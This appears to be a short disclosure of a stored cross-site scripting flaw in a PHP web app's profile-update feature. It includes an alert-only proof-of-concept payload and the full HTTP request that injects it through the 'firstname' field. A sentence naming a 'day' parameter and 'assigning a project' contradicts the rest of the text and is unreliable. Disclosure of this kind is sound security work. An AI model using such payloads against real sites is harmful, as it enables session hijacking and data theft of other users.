The web application is vulnerable to stored cross-site scripting (XSS) attacks within the update profile functionality. Attackers can exploit this vulnerability by injecting malicious JavaScript code into the "firstname" parameter, which is used to assign in updating profile details. When unsuspecting users view the first name of other customer, the injected script executes within their browsers, potentially leading to various malicious activities such as session hijacking or data theft.
To exploit the stored XSS vulnerability, attackers craft a payload containing malicious JavaScript code and inject it into the "day" parameter while assigning a project. For example,
submitting the payload "><img src=x onerror=alert('xss-by-reynaldo')>
triggers an alert box when viewed. This demonstrates the successful execution of arbitrary scripts within the application.
POST /classes/Master.php?f=update_account HTTP/1.1
Host: [REDACTED]
Content-Length: 178
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
Origin: [REDACTED]
Sec-Fetch-Site: same-origin
Referer: [REDACTED]
Cookie: PHPSESSID=[REDACTED]
Connection: close
id=2&firstname="><img+src=x+onerror=alert('xss-by-reynaldo')>&lastname=test&contact=123123123&gender=Male&default_delivery_address=test&email=test%40test.com&password=&cpassword=